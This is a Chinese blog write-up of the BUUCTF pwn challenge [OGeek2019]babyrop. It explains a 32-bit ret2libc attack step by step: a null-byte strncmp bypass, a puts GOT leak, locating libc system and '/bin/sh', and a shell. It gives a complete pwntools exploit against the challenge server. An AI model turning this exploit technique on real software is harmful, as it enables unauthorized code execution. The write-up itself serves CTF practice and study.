buuctf pwn [OGeek2019]babyrop_wp

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量136 收藏
点赞数
分类专栏: wp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HeyGap/article/details/131844548
版权

buuctf pwn [OGeek2019]babyrop_wp

网上很多wp已经不适用了,所以来更新一波XD

0x00 知识点

  1. ret2libc
  2. 提供libc的打法
  3. 绕过strlen & strncmp函数

0x01 解题步骤

不贴图了,按伪代码顺序来

  1. fd是urandom库生成的随机数
  2. 将fd读4位进buf
  3. 将buf作为参数传进函数A,在A中称作a1
  4. 将a1读进s
  5. 用户输入buf,但限制读入长度0x20,无法溢出;但可以考虑泄露
  6. v1赋值为buf的长度,绕过strlen & strncmp函数可以用’\x00’
  7. 返回buf[7],传入函数B,在B中称作a1,是read的检测长度,如果足够长可以构造溢出
    于是函数A中的read我们有思路了,即
    1. 绕过strlen
    2. 返回buf[7]越大越好
payload  =  '\x00' + '\xff' * 7

io.sendline(payload)                              # Q1:为什么非得是sendline而不能是send?

io.recvuntil(b"Correct\n")
  1. B中观察栈的结构可知,我们可以用0xE7+4的垃圾数据抵达返回地址
  2. 由于string中并没有找到system(‘/bin/sh’),而题目提供了libc,所以我们可以泄露libc基地址;由于函数B结束后程序即将结束,我们已经没有溢出的点了,所以考虑将main作为返回地址,再来提供一次溢出,所以考虑构造payload2:
xxxxxx
xxxxxx<-----垃圾数据
puts_plt<---调用puts
main_addr<--将puts的返回地址压栈,即将eip的下一条指令压栈
puts_got<---将puts的参数弹给puts

junk     =  0xE7 + 4

# payload  =  b'a'*junk + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

payload  =  b'a'*junk + p32(puts_plt) + p32(main_addr) + p32(puts_got)      # Q2: puts为什么不会打印后面的内容了?为什么puts_got后面一定是可以被转换为0a的00?

io.send(payload)

puts_addr =  u32(io.recv(4))

print('puts_addr   --->   ',hex(puts_addr))

# 注1:puts(const char* arg1)一直打印,直到遇到'\0',丢弃'\0'并输出'\n'
# 注2:sszie_t write(fd,const char* src,length) (fd=1,length=32/8 or 64/8)
  1. 泄露libc地址后,泄露system/bin/sh的地址
offset   = puts_addr - libc.sym['puts']

sys_addr = offset + libc.sym['system']

bin_sh   = offset + next(libc.search(b'/bin/sh'))
  1. 再进行一次绕过strncmp
payload  =  '\x00' + '\xff' * 7

io.sendline(payload)

io.recvuntil(b"Correct\n")
  1. 最后提权
payload  =  b'a'* junk + p32(sys_addr) + p32(0) + p32(bin_sh)    # 细节2:覆盖返回地址时,32位需要在栈上补充返回地址
                                                                 # Q3:为什么?
io.send(payload)
  
io.interactive()
  1. 最后贴一下全部exp
from pwn import *

from LibcSearcher import *

io = remote('node4.buuoj.cn',26218)

# context(os='linux', arch='i386', log_level='debug')

elf = ELF('./pwn')

libc = ELF('libc-2.23.so')

context.log_level = 'debug'

  

puts_got =elf.got['puts']

puts_plt =elf.plt['puts']

main_addr = 0x08048825

  

payload  =  '\x00' + '\xff' * 7

io.sendline(payload)

io.recvuntil(b"Correct\n")

  

junk     =  0xE7 + 4

payload  =  b'a'*junk + p32(puts_plt) + p32(main_addr) + p32(puts_got)

puts_addr =  u32(io.recv(4))

print('puts_addr   --->   ',hex(puts_addr))

  

offset   = puts_addr - libc.sym['puts']

sys_addr = offset + libc.sym['system']

bin_sh   = offset + next(libc.search(b'/bin/sh'))

  

payload  =  '\x00' + '\xff' * 7

io.sendline(payload)

io.recvuntil(b"Correct\n")

  

payload  =  b'a'* junk + p32(sys_addr) + p32(0) + p32(bin_sh)

io.send(payload)

  

io.interactive()

0x02 一些思考

  1. 本题还可以有以下几种打法
    1. 泄露地址方面:不仅可以用puts,还可以用write;讲道理一切能输出到终端的函数都可以利用来泄露内容,后续慢慢探索
    2. 泄露地址后,我们可以用og进行提权
  2. 一些工具的使用
    1. flat可以用来构造payload

0x03 一些问题

  1. 0x01 中第七步payload,为什么在send时只能是sendline,我看received的结果明明都一样啊
  2. 0x01 中第九步payload,puts为什么不会打印后面的内容了(代码底部’注2’)?为什么puts_got后面一定是可以被转换为0a的00?
  3. 0x01 中第12步payload,为什么需要sys_addr + 0 + bin_sh,这个0是sys_addr的返回地址吗?
  4. 网上很多博客都用LibcSearcher,可是我在将LibcSearcher数据库更新到最新版本以后还是无法查到对应libc库,很奇怪
HeyGap
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn刷题num25---- strncmp绕过 + 整数溢出 + ret2libc
tbsqigongzi的博客
04-26 1044
BUUCTF-PWN-[OGeek2019]babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后,先让我们输入name,又让我们输入密码, ida一下看一下主函数 首先调用一个sub_80486BB()函数· 一些打初始化的操作 然后打开了一个文
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 531
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 262
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 425
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 755
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 955
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 601
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 786
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 517
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
【内网安全】横向移动-PTH哈希-PTT票据-PTK密钥
qq_55349490的博客
07-19 722
pass the hash(哈希传递攻击,简称pth)pass the ticket(票据传递攻击,简称ptt)pass the key(密钥传递攻击,简称ptk)PTH(pass the hash) 利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)PTK(pass the key) 利用的ekeys aes256进行的渗透测试(NTLM认证攻击)PTT(pass the ticket) 利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)
安全防御:防火墙基本模块
zhugedali_的博客
07-16 852
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 261
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
Lianwei 安全周报|2024.07.15
联蔚盘云的博客
07-15 1259
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
安全】系统安全设计规范(DOC完整版)
2302_79423711的博客
07-16 364
软件资料清单列表部分文档:工作安排任务书,可行性分析报告,立项申请审批表,产品需求规格说明书,需求调研计划,用户需求调查单,用户需求说明书,概要设计说明书,技术解决方案,数据库设计说明书,详细设计说明书,单元测试报告,总体测试计划,单元测试计划,产品集成计划,集成测试报告,集成测试计划,系统测试报告,产品交接验收单,验收报告,验收测试报告,压力测试报告,项目总结报告,立项结项审批表,成本估算表,项目计划,项目周报月报,风险管理计划,质量保证措施,项目甘特图,项目管理工具,操作手册,接口设计文档,软件实施方案
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值